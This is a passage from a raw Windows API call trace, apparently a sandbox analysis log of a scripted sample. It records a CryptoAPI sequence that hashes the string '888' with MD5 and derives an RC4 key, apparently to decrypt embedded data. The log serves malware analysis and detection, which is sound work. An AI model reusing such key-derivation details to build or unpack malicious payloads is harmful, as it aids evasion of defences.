lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.702] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.702] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.702] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.702] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.703] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.703] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.703] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0209.703] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.703] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.703] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.703] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.703] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.703] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.704] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.704] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.704] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.704] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.704] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.704] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6e80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.704] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c110) returned 1 [0209.705] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.705] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.705] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0209.705] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.705] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0209.705] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.705] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.705] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.705] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.705] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.705] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.705] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.705] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.705] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.705] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.706] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0209.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.706] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0209.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.706] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.706] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.706] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.706] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.706] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.706] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.707] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.707] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.707] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.707] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.707] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.707] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.707] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.707] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.707] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.707] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.707] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.707] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.707] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.707] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.707] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.707] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.707] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.707] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.707] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.707] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.707] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.708] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.708] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab3c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0209.708] CryptCreateHash (in: hProv=0xa7c110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0209.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ba8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.708] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.708] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.708] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.708] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.708] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.708] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0209.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab3e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0209.709] CryptHashData (hHash=0x9e1c38, pbData=0x2a71c28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.710] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.710] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.710] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.710] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.710] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.710] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.710] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.710] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.710] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.710] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab368, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.710] CryptDeriveKey (in: hProv=0xa7c110, Algid=0x6601, hBaseData=0x9e1c38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1cb8) returned 1 [0209.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cf3b8, 